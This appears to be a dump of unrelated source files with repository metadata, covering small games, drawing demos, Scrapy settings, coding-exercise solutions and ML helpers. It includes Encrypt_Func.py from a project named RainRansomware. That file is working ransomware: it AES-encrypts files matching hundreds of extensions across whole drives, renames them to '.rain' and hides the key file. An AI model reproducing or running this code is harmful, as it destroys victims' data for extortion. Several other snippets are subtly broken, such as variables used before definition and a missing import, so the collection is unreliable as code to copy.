main_function("$10 $3 #6 &10 $4 #10 *J $2 &2 *10 $6 *6 $8")
main_function("#K &8 #10 $3 &A #9 *5 &6 *10 $6 #7 *J $J")
main_function("$6 #Q &4 #10 *J &3 *A *2 #J &K *10 $2 &Q")
main_function("#5 #K &2 $K *J &7 #6 *6 *Q *4 &5 &6 #9")
main_function("*9 *5 #4 &J *Q #3 *6 $J $K #7 #Q $Q *10")
main_function("#5 $2 &10 #8 &J *4 *Q $4 *3 &K &8 $Q #9")
main_function("$K #5 &5 *10 &4 #J &A $6 *4 #Q $2 #7 &K")
main_function("$8 &3 #9 $9 $J $Q *3 #6 #Q &K &J &2 #K")
main_function("*7 #3 *5 &3 #7 $8 &5 &J $4 &9 $Q $K *Q")
main_function("#A $2 #3 $4 #5 $6 #7 $8 #9 $10 #J $Q #K")
main_function("#A #2 #3 #4 #5 #6 #7 #8 #9 #10 #J #Q #K")
|
[
"noreply@github.com"
] |
1647790440.noreply@github.com
|
830d131f23bacfdfed88af9c12a931039c242ac7
|
55c78ec3a7356827c3d481cf71a9c293c3976da7
|
/3-canvas-drawing.py
|
c8dff50a0dac6c82b0ce4548469c5859eb85d789
|
[] |
no_license
|
BobbyJoeSmith3/interactive-python-code-examples
|
238041dba027a19320fcd3203ef58d4252629228
|
6784d1cd1b3a2009fe99dfd0b4f2a98db0997b97
|
refs/heads/master
| 2016-09-01T05:27:59.991367
| 2015-11-23T09:04:36
| 2015-11-23T09:04:36
| 43,130,153
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,562
|
py
|
#############################################/
# first example of drawing on the canvas
#############################################/
import simplegui
# define draw handler
def draw(canvas):
canvas.draw_text("Hello!",[100, 100], 24, "White")
canvas.draw_circle([100, 100], 2, 2, "Red")
# create frame
frame = simplegui.create_frame("Text drawing", 300, 200)
# register draw handler
frame.set_draw_handler(draw)
# start frame
frame.start()
#############################################/
# second example of drawing on the canvas
#############################################/
# example of drawing operations in simplegui
# standard HMTL color such as "Red" and "Green"
# note later drawing operations overwrite earlier drawing operations
import simplegui
# Handler to draw on canvas
def draw(canvas):
canvas.draw_circle([100, 100], 50, 2, "Red", "Pink")
canvas.draw_circle([300, 300], 50, 2, "Red", "Pink")
canvas.draw_line([100, 100],[300, 300], 2, "Black")
canvas.draw_circle([100, 300], 50, 2, "Green", "Lime")
canvas.draw_circle([300, 100], 50, 2, "Green", "Lime")
canvas.draw_line([100, 300],[300, 100], 2, "Black")
canvas.draw_polygon([[150, 150], [250, 150], [250, 250], [150, 250]], 2,
"Blue", "Aqua")
canvas.draw_text("An example of drawing", [60, 385], 24, "Black")
# Create a frame and assign callbacks to event handlers
frame = simplegui.create_frame("Home", 400, 400)
frame.set_draw_handler(draw)
frame.set_canvas_background("Yellow")
# Start the frame animation
frame.start()
|
[
"bobbyjoe@codeforprogress.org"
] |
bobbyjoe@codeforprogress.org
|
a200e9f8c40e06ecc7a820150987c01b6767679e
|
4d7aceb626d3b403db87ea828b81afed3c8a4b72
|
/deck_chores/indexes.py
|
2a65d8ca5f93d9349a0e9dc60278ab50a90787ee
|
[
"ISC"
] |
permissive
|
geraldaistleitner/swarmcron
|
b8ac0f381d581eb6b815cba83dc755f0c16afe2d
|
65af51bf01b209c5a4ffc5f1c9517058a533dae4
|
refs/heads/master
| 2021-10-07T17:06:38.708069
| 2021-09-29T14:13:29
| 2021-09-29T14:13:29
| 170,665,879
| 0
| 1
|
ISC
| 2021-09-29T14:13:30
| 2019-02-14T09:39:36
|
Python
|
UTF-8
|
Python
| false
| false
| 188
|
py
|
from typing import Dict # noqa: F401
locking_container_to_services_map = {} # type: Dict[str, str]
""" A mapping of locking container ids to service ids whose jobs have been added. """
|
[
"funkyfuture@riseup.net"
] |
funkyfuture@riseup.net
|
b4ee29843b0cf4d85378ebc64bb85e605f056a44
|
5fc4fb33fb9c5f4c98c5172286a0884874b6fe34
|
/games/snake/snake-game.py
|
afca8bebc995434c2c5d2ce6fe3183c74af26eac
|
[] |
no_license
|
AdrianoPereira/playground
|
f1358324502c2cef81c8bfd9aa3e1503c4e0f08f
|
ccf5fbe4def6aeba1bd04527e525b7c61494f9ef
|
refs/heads/master
| 2022-07-09T23:32:41.991799
| 2020-05-11T20:08:11
| 2020-05-11T20:08:11
| 263,137,001
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,789
|
py
|
import pygame
import random
# from pygame.locals import *
pygame.init()
pygame.display.set_caption("Adriano\'s Playground - Snake Game")
SIZE_WINDOW = (600, 600)
SIZE_BLOCK = (10, 10)
COLOR_SNAKE = (255, 255, 255)
COLOR_APPLE = (255, 0, 0)
COLOR_TEXT = (0, 255, 0)
COLOR_BKG = (0, 0, 0)
GRID_COLOR = (30, 30, 30)
UP, RIGHT, DOWN, LEFT = 0, 1, 2, 3
def generate_apple():
def random_number():
ans = random.randint(-10, 590)
rem = ans%10
return ans+10-rem
x = random_number()
y = random_number()
return (x, y)
def eat_apple(snake, apple):
return snake[0][0] == apple[0] and snake[0][1] == apple[1]
def detect_colision(snake):
if snake[0][0] == SIZE_WINDOW[0] or snake[0][1] == SIZE_WINDOW[1]:
return True
if snake[0][0] < 0 or snake[0][1] < 0:
return True
for x in range(1, len(snake)-1):
if snake[0][0] == snake[x][0] and snake[0][1] == snake[x][1]:
return True
return False
screen = pygame.display.set_mode(SIZE_WINDOW)
snake = [(200, 200), (210, 200), (220, 200)]
snake_sprite = pygame.Surface(SIZE_BLOCK)
snake_sprite.fill(COLOR_SNAKE)
apple_position = generate_apple()
# apple_sprite = pygame.Surface(SIZE_BLOCK)
apple_sprite = pygame.image.load("assets/apple.gif")
apple_sprite = pygame.transform.scale(apple_sprite, SIZE_BLOCK)
# apple_sprite.fill(COLOR_APPLE)
head_sprites = ["assets/head-up.png", "assets/head-right.png",
"assets/head-down.png", "assets/head-left.png"]
body_sprites = ["assets/body-v.png", "assets/body-h.png"]
font = pygame.font.Font('freesansbold.ttf', 14)
score = 0
movement = LEFT
clock = pygame.time.Clock()
snapshot = 1
while True:
clock.tick(10)
pygame.image.save(screen, "snapshots/snake-%s.png"%(str(snapshot).zfill(5)))
snapshot += 1
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_UP and movement is not DOWN:
movement = UP
if event.key == pygame.K_RIGHT and movement is not LEFT:
movement = RIGHT
if event.key == pygame.K_DOWN and movement is not UP:
movement = DOWN
if event.key == pygame.K_LEFT and movement is not RIGHT:
movement = LEFT
if eat_apple(snake, apple_position):
apple_position = generate_apple()
snake.append((0, 0))
score += 1
if detect_colision(snake):
print('game over')
for x in range(len(snake)-1, 0, -1):
snake[x] = (snake[x-1][0], snake[x-1][1])
if movement == UP:
snake[0] = (snake[0][0], snake[0][1]-10)
if movement == RIGHT:
snake[0] = (snake[0][0]+10, snake[0][1])
if movement == DOWN:
snake[0] = (snake[0][0], snake[0][1]+10)
if movement == LEFT:
snake[0] = (snake[0][0]-10, snake[0][1])
screen.fill(COLOR_BKG)
for x in range(0, 600, 10):
pygame.draw.line(screen, GRID_COLOR, (x, 0), (x, 600))
pygame.draw.line(screen, GRID_COLOR, (0, x), (600, x))
score_text = font.render('Score: %s'%str(score).zfill(3), True, COLOR_TEXT)
score_rect = score_text.get_rect()
score_rect.topleft = (SIZE_WINDOW[0]-80, 10)
screen.blit(score_text, score_rect)
screen.blit(apple_sprite, apple_position)
head_snake = pygame.image.load(head_sprites[movement])
head_snake = pygame.transform.scale(head_snake, SIZE_BLOCK)
screen.blit(head_snake, snake[0])
body_snake = pygame.image.load(body_sprites[movement%2])
body_snake = pygame.transform.scale(body_snake, SIZE_BLOCK)
for pos in range(1, len(snake)):
screen.blit(body_snake, snake[pos])
pygame.display.update()
|
[
"adriano.almeida@inpe.br"
] |
adriano.almeida@inpe.br
|
f610ffc8ef9f81715405b80633828b49bbe5d58a
|
f725991c3e14bceb09ad5a9872ee17b39f16f58b
|
/rlocker_crawler/rlocker_crawler/settings.py
|
3fde3d55df5f9b467b9764230b534edfb6c62be3
|
[] |
no_license
|
rabbicse/scrapy-crawlers
|
757e3ce83610f3ea5fc899f611f274e7fab9f19d
|
623caa7b45b15efc5ac06edb4badbc1519af46fb
|
refs/heads/master
| 2020-05-17T19:27:30.620907
| 2020-01-28T13:52:11
| 2020-01-28T13:52:11
| 183,915,392
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,737
|
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for rlocker_crawler project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'rlocker_crawler'
SPIDER_MODULES = ['rlocker_crawler.spiders']
NEWSPIDER_MODULE = 'rlocker_crawler.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
# USER_AGENT = 'rlocker_crawler (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
CONCURRENT_REQUESTS = 1
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
CONCURRENT_REQUESTS_PER_DOMAIN = 1
CONCURRENT_REQUESTS_PER_IP = 1
# Disable cookies (enabled by default)
COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
TELNETCONSOLE_ENABLED = False
# Override the default request headers:
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Upgrade-Insecure-Requests': '1',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate, br',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',
}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
# 'rlocker_crawler.middlewares.RlockerCrawlerSpiderMiddleware': 543,
# }
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# DOWNLOADER_MIDDLEWARES = {
# 'rlocker_crawler.middlewares.RlockerCrawlerDownloaderMiddleware': 543,
# 'scrapy.downloadermiddlewares.httpproxy.HttpProxyMiddleware': 100,
# 'rlocker_crawler.random_proxies.RandomProxy': 110
# }
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
# EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
# }
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'rlocker_crawler.pipelines.RlockerCrawlerPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
# AUTOTHROTTLE_ENABLED = True
# The initial download delay
# AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
# AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
# AUTOTHROTTLE_DEBUG = False
DOWNLOAD_TIMEOUT = 60
# Retry many times since proxies often fail
RETRY_TIMES = 5
# Retry on most error codes since proxies fail for different reasons
RETRY_HTTP_CODES = [500, 503, 504, 400, 403, 408, 410, 429]
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
# HTTPCACHE_ENABLED = True
# HTTPCACHE_EXPIRATION_SECS = 0
# HTTPCACHE_DIR = 'httpcache'
# HTTPCACHE_IGNORE_HTTP_CODES = []
# HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
# Proxy list containing entries like
# http://host1:port
# http://username:password@host2:port
# http://host3:port
# ...
PROXY_LIST = 'proxy.txt'
# Proxy mode
# 0 = Every requests have different proxy
# 1 = Take only one proxy from the list and assign it to every requests
# 2 = Put a custom proxy to use in the settings
PROXY_MODE = 0
DATABASE = {'drivername': 'mysql',
'host': '127.0.0.1',
'port': '3306',
'username': 'admin', # fill in your username here
'password': 'password', # fill in your password here
'database': 'scrapy'}
FEED_EXPORTERS = {
'csv': 'rlocker_crawler.exporters.QuoteAllCsvItemExporter',
}
'''
1) professionalgardening.com (done)
2) megawatthydro.com (done)
3)Biofloral.com (done)
4)hydrotekhydroponics.com (done)
5)mygreenplanet.com (done)
6)hawthornegc.ca (done)
7) eddiswholesale.com (done)
8) ledab.ca (done)
9) naturalinsectcontrol.com
10) growlights.ca (done)
11) https://truenorthseedbank.com/ (done)
'''
|
[
"rabbi.se@gmail.com"
] |
rabbi.se@gmail.com
|
bc8b36a424ab98f4770ebae36926e8fe9c9b0733
|
72b77f97876983025eb05a5aa1d6f248a1be3074
|
/longest_continuous_increasing_subsequence.py
|
e6b446941c7c22169713dfd26ac166f4ad59fdd0
|
[
"Apache-2.0"
] |
permissive
|
erjan/coding_exercises
|
4c6bccb2cdac65ccbc3107a482914275ecd157f7
|
68dac358a6d4dabd41d47dbd4addb2ec50e0ca11
|
refs/heads/master
| 2023-09-02T07:25:30.886175
| 2023-08-27T06:13:06
| 2023-08-27T06:13:06
| 236,281,070
| 5
| 0
|
Apache-2.0
| 2020-05-05T15:08:49
| 2020-01-26T07:32:09
|
Python
|
UTF-8
|
Python
| false
| false
| 1,171
|
py
|
'''
Given an unsorted array of integers nums, return the
length of the longest continuous increasing subsequence (i.e. subarray). The subsequence
must be strictly increasing.
A continuous increasing subsequence is defined
by two indices l and r (l < r) such that it is [nums[l], nums[l + 1], ..., nums[r - 1], nums[r]] and for each l <= i < r, nums[i] < nums[i + 1].
'''
class Solution:
def findLengthOfLCIS(self, nums: List[int]) -> int:
c = 1
maxcount = 0
for i in range(1, len(nums)):
if nums[i-1] < nums[i]:
c += 1
else:
maxcount = max(maxcount, c)
c = 1
res = max(c, maxcount)
print(res)
return res
--------------------------------
#my own solution
class Solution:
def findLengthOfLCIS(self, nums: List[int]) -> int:
best_r = 1
cur_r = 1
for i in range(len(nums)-1):
if nums[i] < nums[i+1]:
cur_r += 1
if cur_r > best_r:
best_r = cur_r
else:
cur_r = 1
print(best_r)
return best_r
|
[
"noreply@github.com"
] |
erjan.noreply@github.com
|
b984fad51d38c97d1517e90fadc6e66c577c4301
|
913b8f04184701fdb5694934202fa2df520c25bd
|
/105/submissions/save1_nopass.py
|
cd61998f18643868353e99fce4ea011f987a07d1
|
[] |
no_license
|
demarcoz/bitesofpy
|
f08d6bda1d2ad791692ba5fee2657da7010de093
|
efd25df028c1205030c3331d6e1c6994bbad3e64
|
refs/heads/master
| 2021-07-08T01:03:26.552573
| 2020-12-03T19:06:31
| 2020-12-03T19:06:31
| 214,622,046
| 0
| 0
| null | 2020-10-04T17:15:28
| 2019-10-12T09:49:03
|
Python
|
UTF-8
|
Python
| false
| false
| 1,122
|
py
|
from string import ascii_lowercase
text = """
One really nice feature of Python is polymorphism: using the same operation
on different types of objects.
Let's talk about an elegant feature: slicing.
You can use this on a string as well as a list for example
'pybites'[0:2] gives 'py'.
The first value is inclusive and the last one is exclusive so
here we grab indexes 0 and 1, the letter p and y.
When you have a 0 index you can leave it out so can write this as 'pybites'[:2]
but here is the kicker: you can use this on a list too!
['pybites', 'teaches', 'you', 'Python'][-2:] would gives ['you', 'Python']
and now you know about slicing from the end as well :)
keep enjoying our bites!
"""
def slice_and_dice(text: str = text) -> list:
"""Get a list of words from the passed in text.
See the Bite description for step by step instructions"""
# strip whitespace
text = text.strip().split('\n')
for line in text:
text.lstrip()
if text[0].islower():
results.append(text.split()[-1].rstrip(".!"))
results = []
|
[
"marco@dezeeuw.nl"
] |
marco@dezeeuw.nl
|
d17c40169309fae699d24035ed83d100dd1e82cf
|
4dc6ac7f6242f86abdc0db1147bcb4768649500d
|
/colab_files/vgg_inverter.py
|
192e290016891a5eb71ce2dbd7b153f7a5d9b29d
|
[] |
no_license
|
jonshamir/vgg_feat_gen
|
1c6fbef589c32246cf428083b155cccb94cf4ff1
|
2f288cb3069fdcf585c7ef431ed67d7423bab268
|
refs/heads/master
| 2020-07-04T16:03:56.586055
| 2019-12-01T17:40:26
| 2019-12-01T17:40:26
| 202,321,819
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,412
|
py
|
import torch
import torch.nn as nn
import torchvision.utils as vutils
import os
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Generator(nn.Module):
"""
Convolutional Generator
"""
def __init__(self, nc=3):
super(Generator, self).__init__()
self.conv = nn.Sequential(
# 7 -> 7
nn.ConvTranspose2d(512, 256, 3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
# 7 -> 14
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
# 14 -> 28
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(),
# 28 -> 56
nn.ConvTranspose2d(64, nc, 4, stride=2, padding=1, bias=False),
nn.Tanh(),
)
def forward(self, input):
# input: (N, 100)
out = self.conv(input)
return out
G = Generator().to(DEVICE)
dirname = os.path.dirname(__file__)
filename = os.path.join(dirname, 'inverter_frogs_normalized.pkl')
G.load_state_dict(torch.load(filename))
G.eval()
def features2images(feats):
fake = G(feats).detach().cpu()
img = vutils.make_grid(fake, normalize=True, pad_value=1)
return img.permute(1, 2, 0) # reorganize image channel order
|
[
"jon.shamir@gmail.com"
] |
jon.shamir@gmail.com
|
1c3ebd9442a77a92bbfe5ad5f27147202fff595b
|
85821b9fe24a19d59704814f6440c9aa5023cdcd
|
/dictionary.py
|
8c0b8d1bc46897ac4752076fa397d668cc6da91b
|
[] |
no_license
|
Tunna/Tuples_Dictionaries
|
c87c5e3f8ff32ef1191e6051669567fb9eac3161
|
32262839f8f7170417de9852aab90d2563bce38c
|
refs/heads/master
| 2020-12-29T01:10:36.525591
| 2016-08-23T06:15:51
| 2016-08-23T06:15:51
| 65,349,909
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 408
|
py
|
# def name_count(name):
# count_dictionary = {}
# for letter in name:
# if letter in count_dictionary:
# count_dictionary[letter] + 1
# else:
# count_dictionary[letter] = 1
# print count_dictionary
# name_count("trushna")
fruit_cost = {"banana": 4, "apple": 2, "orange": 1.5, "pear": 3}
maxm = max(fruit_cost.values())
for key, value in fruit_cost.items():
if value ==maxm:
print key
|
[
"tmajmundar@gmail.com"
] |
tmajmundar@gmail.com
|
635677878fedc186df66df534c9b25b1c22b5c01
|
868bbd26e5e9674b879278d4429d435c91e1b4f0
|
/Source-Code/Functions/Encrypt_Func.py
|
ca95c2a85371665cd1725fa6fc0d60849424bdcb
|
[] |
no_license
|
shariarislam/RainRansomware
|
276ee99b8c1dcd9c7181bc892823d6ac5b38746d
|
d2991a2f7a899d6ffb901017524cf7547dac77ee
|
refs/heads/master
| 2020-09-10T06:52:03.716471
| 2019-10-30T02:15:43
| 2019-10-30T02:15:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,479
|
py
|
import os,platform,glob,sys,string
from os import system as sis
from Crypto.Cipher import AES
from Crypto import Random
BLOCK_SIZE = 32
s = platform.system()
k = Random.new().read(BLOCK_SIZE)
aes = AES.new(k,AES.MODE_ECB)
drives = list(string.ascii_uppercase)
ext=['*.php','*.pl','*.7z','*.rar','*.m4a','*.wma','*.avi','*.wmv','*.csv','*.d3dbsp','*.sc2save','*.sie','*.sum','*.ibank','*.t13','*.t12','*.qdf','*.gdb','*.tax'
,'*.pkpass','*.bc6','*.bc7','*.bkp','*.qic','*.bkf','*.sidn','*.sidd','*.mddata','*.itl','*.itdb','*.icxs','*.hvpl','*.hplg','*.hkdb','*.mdbackup','*.syncdb','*.gho'
,'*.cas','*.svg','*.map','*.wmo','*.itm','*.sb','*.fos','*.mcgame','*.vdf','*.ztmp','*.sis','*.sid','*.ncf','*.menu','*.layout','*.dmp','*.blob','*.esm','*.001'
,'*.vtf','*.dazip','*.fpk','*.mlx','*.kf','*.iwd','*.vpk','*.tor','*.psk','*.rim','*.w3x','*.fsh','*.ntl','*.arch00','*.lvl','*.snx','*.cfr','*.ff','*.vpp_pc','*.lrf'
,'*.m2','*.mcmeta','*.vfs0','*.mpqge','*.kdb','*.db0','*.mp3','*.upx','*.rofl','*.hkx','*.bar','*.upk','*.das','*.iwi','*.litemod','*.asset','*.forge','*.ltx','*.bsa'
,'*.apk','*.re4','*.sav','*.lbf','*.slm','*.bik','*.epk','*.rgss3a','*.pak','*.big','*.unity3d','*.wotreplay','*.xxx','*.desc','*.py','*.m3u','*.flv','*.js','*.css'
,'*.rb','*.png','*.jpeg','*.p7c','*.p7b','*.p12','*.pfx','*.pem','*.crt','*.cer','*.der','*.x3f','*.srw','*.pef','*.ptx','*.r3d','*.rw2','*.rwl','*.raw','*.raf'
,'*.orf','*.nrw','*.mrwref','*.mef','*.erf','*.kdc','*.dcr','*.cr2','*.crw','*.bay','*.sr2','*.srf','*.arw','*.3fr','*.dng','*.jpeg','*.jpg','*.cdr','*.indd','*.ai'
,'*.eps','*.pdf','*.pdd','*.psd','*.dbfv','*.mdf','*.wb2','*.rtf','*.wpd','*.dxg','*.xf','*.dwg','*.pst','*.accdb','*.mdb','*.pptm','*.pptx','*.ppt','*.xlk','*.xlsb'
,'*.xlsm','*.xlsx','*.xls','*.wps','*.docm','*.docx','*.doc','*.odb','*.odc','*.odm','*.odp','*.ods','*.odt','*.sql','*.zip','*.tar','*.tar.gz','*.tgz','*.biz','*.ocx'
,'*.html','*.htm','*.3gp','*.srt','*.cpp','*.mid','*.mkv','*.mov','*.asf','*.mpeg','*.vob','*.mpg','*.fla','*.swf','*.wav','*.qcow2','*.vdi','*.vmdk','*.vmx','*.gpg'
,'*.aes','*.ARC','*.PAQ','*.tar.bz2','*.tbk','*.bak','*.djv','*.djvu','*.bmp','*.cgm','*.tif','*.tiff','*.NEF','*.cmd','*.class','*.jar','*.java','*.asp','*.brd'
,'*.sch','*.dch','*.dip','*.vbs','*.asm','*.pas','*.ldf','*.ibd','*.MYI','*.MYD','*.frm','*.dbf','*.SQLITEDB','*.SQLITE3','*.asc','*.lay6','*.lay','*.ms11 (Security copy)'
,'*.sldm','*.sldx','*.ppsm','*.ppsx','*.ppam','*.docb','*.mml','*.sxm','*.otg','*.slk','*.xlw','*.xlt','*.xlm','*.xlc','*.dif','*.stc','*.sxc','*.ots','*.ods','*.hwp'
,'*.dotm','*.dotx','*.docm','*.DOT','*.max','*.xml','*.uot','*.stw','*.sxw','*.ott','*.csr','*.key','wallet.dat','*.veg','*.application','*.lnk','*.bitmap','*.gif'
,'*.chc','*.ogg','*.json','*.real','*.xz','*.nrg','*.xvf','*.xvfz','*.tmp','*.sublime-package','*.img','*.bg2','*.qxd','*.new','*.ico','*.pps','*.pic','*.iso','*.rm'
,'*.dxf','*.so','*.appref-ms','*.desktop','*.list']
class Crypt:
"""
Class containing the methods used for encryption
"""
def crypt(file):
"""
Encrypt a file
"""
try:
with open(file,'rb') as f:
f = f.read()
correct = f+b'#'*(16-len(f)%16)
cifdata = aes.encrypt(correct)
with open(file,'wb') as cifile:
cifile.write((os.path.splitext(file)[1].strip('.')+'.').encode()+cifdata)
ne = os.path.splitext(file)[0]
os.rename(file,ne+".rain")
except:
pass
def c_iterator(dirct):
#An iterator that uses glob to search for files with pre-defined extensions and encrypt them
for i in ext:
iterator = glob.iglob(dirct+'/**/'+i,recursive=True)
for file in iterator:
Crypt.crypt(file)
def infectall():
"""
Once you have encrypted the three main directories using "c_iterator" this function is used,
which encrypts the rest of the entire disk and ,in Windows,
searches for the drives inserted in the machine and continues the process
"""
if s=='Windows':
for drive in drives:
drive = drive+':/'
for e in ext:
iterator = glob.iglob(drive+'/**/'+e,recursive=True)
for file in iterator:
Crypt.crypt(file)
elif s=='Linux':
for e in ext:
iterator = glob.iglob('//**/'+e,recursive=True)
for file in iterator:
Crypt.crypt(file)
def resource_path(relative_path):
"""
Here is just a fix so there are no compile errors with certain libraries
"""
if hasattr(sys, '_MEIPASS'):
return os.path.join(sys._MEIPASS, relative_path)
return os.path.join(os.path.abspath("."), relative_path)
def check_if_is_admin():
"""
Check if the program was run with administrative powers.
"""
if s=='Windows':
try:
with open(r'C:\Windows\System32\cap','wb') as f:
f.write('isornot'.encode())
except PermissionError:
return False
os.remove(r'C:\Windows\System32\cap')
return True
elif s=='Linux':
if(os.getuid()==0):
return True
else:
return False
def check_w_key(documents,documentos=os.path.expanduser('~/Documentos')):
"""
This method in particular ensures the functionality of subsequent decryption.
Basically it checks if a key has already been generated for that computer by reading the saved key files.
This helps to ensure that a new key is not created when the machine is restarted and the new one is lost.
Maybe it would be much better just to save in a text file a "0" state for key saved or know what to do all that code.
Forgive me. I need help.
"""
global k
if s=='Windows':
try:
try:
with open(documents+'/.officek','rb') as okey:
ok = okey.read()
if len(ok)==32:
k = ok
else:
try:
with open(documents+'/.officek','wb') as key:
key.write(k)
sis('cd '+documents)
sis('attrib +s +h '+documents+'/.officek')
except:
pass
except:
try:
with open(documents+'/.officek','wb') as key:
key.write(k)
sis('cd '+documents)
sis('attrib +s +h '+documents+'/.officek')
except:
pass
except:
try:
with open('C:/Users/Public/.officek','rb') as okey:
ok = okey.read()
if len(ok)==32:
k = ok
else:
try:
with open('C:/Users/Public/.officek','wb') as key:
key.write(k)
sis('cd C:/Users/Public')
sis('attrib +s +h C:/Users/Public/.officek')
except:
pass
except:
try:
with open('C:/Users/Public/.officek','wb') as key:
key.write(k)
sis('cd C:/Users/Public')
sis('attrib +s +h C:/Users/Public/.officek')
except:
pass
elif s=='Linux':
try:
try:
with open(documents+'/.officek','rb') as okey:
ok = okey.read()
if len(ok)==32:
k = ok
else:
try:
with open(documents+'/.officek','wb') as key:
key.write(k)
except:
pass
except:
try:
with open(documents+'/.officek','wb') as key:
key.write(k)
except:
pass
except:
try:
with open(documentos+'/.officek','rb') as okey:
ok = key.read()
if len(ok)==32:
k = ok
else:
try:
with open(documentos+'/.oficcek','wb') as key:
key.write(k)
except:
pass
except:
try:
with open(documentos+'/.oficcek','wb') as key:
key.write(k)
except:
pass
|
[
"noreply@github.com"
] |
shariarislam.noreply@github.com
|
072d3acc8178cbc92f168df6263f558c08a1f546
|
2dfbd1328e4dd6dc9852d52e90cd627b402059e1
|
/OOPALL/Hakrrank_problem/groups.py
|
dd5675819998703af1eb88b8a888df0b993a1557
|
[] |
no_license
|
Bappy200/Python
|
2817bcb32bf751033fadc960694704a546055e47
|
0ad3d53cc204af361890182585cdf9bd3ec9a199
|
refs/heads/main
| 2023-03-01T05:29:32.994940
| 2021-02-12T23:08:36
| 2021-02-12T23:08:36
| 338,268,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 76
|
py
|
import re
r = re.search(r'(\w)\1+',input())
print(r.group(1) if r else -1)
|
[
"sbappyi200@gmail.com"
] |
sbappyi200@gmail.com
|
86e07b1730af7e8a3340956c2429f3b0648d9add
|
23d08c6d3331179aaf91ea987dc57168f130553d
|
/dailyfresh_plus/user/migrations/0002_auto_20190611_1605.py
|
ac03219983203450879d348487cbf15815643131
|
[] |
no_license
|
bajiucoding/dailyfresh_plus
|
a02d23531e5d4a6215fe3ac2490d0020251d9e0e
|
a6d0911df1e4a301aa2a076407c22fa8f83ea252
|
refs/heads/master
| 2020-05-26T18:35:37.648086
| 2019-06-23T17:05:15
| 2019-06-23T17:05:15
| 188,337,705
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 413
|
py
|
# Generated by Django 2.2 on 2019-06-11 08:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='userinfo',
name='uemail',
field=models.CharField(max_length=40, verbose_name='邮箱'),
),
]
|
[
"gxylogin@sina.com"
] |
gxylogin@sina.com
|
b51b5706808d245fd63e7a99d9debb2c38961964
|
235dfd0b3ba5ba3c5c7ca36e80b9eb4fc67c8b95
|
/SSD_active_crowd_analysis/ssd/utils/heatmap.py
|
44346c70da780c5fcb32727ee3e25d49e2a6623a
|
[
"MIT"
] |
permissive
|
SamSamhuns/active_crowd_analysis
|
2473601463552f8543e156855b830e946236ff0e
|
99fe12812b74ac487d394211e9bd54ae9173faf1
|
refs/heads/master
| 2023-02-13T15:03:12.732311
| 2021-01-23T12:10:20
| 2021-01-23T12:10:20
| 280,635,459
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,847
|
py
|
import cv2
import math
import time
import numpy as np
import seaborn as sns
import matplotlib.cm as cm
import matplotlib.pyplot as plt
from sklearn.mixture import GaussianMixture
def generate_sns_kde_heatmap(x, y, i=0, image_name=""):
start = time.time()
try:
x = np.hstack((x, x + 2, x - 2, x))
y = np.hstack((y - 10, y, y, y + 8))
plt.gca().invert_yaxis()
fig = sns.kdeplot(x, y, cmap=cm.jet, shade=True)
fig = fig.get_figure()
plt.scatter(x, y, 3)
fig.savefig(f'demo/result/{image_name.split(".")[0]}_snshmap{i}.{image_name.split(".")[1]}')
print(f"seaborn kde plot time {round((time.time() - start) * 1000, 3)}ms")
plt.clf()
except Exception as e:
print("SNS kde error")
print(e)
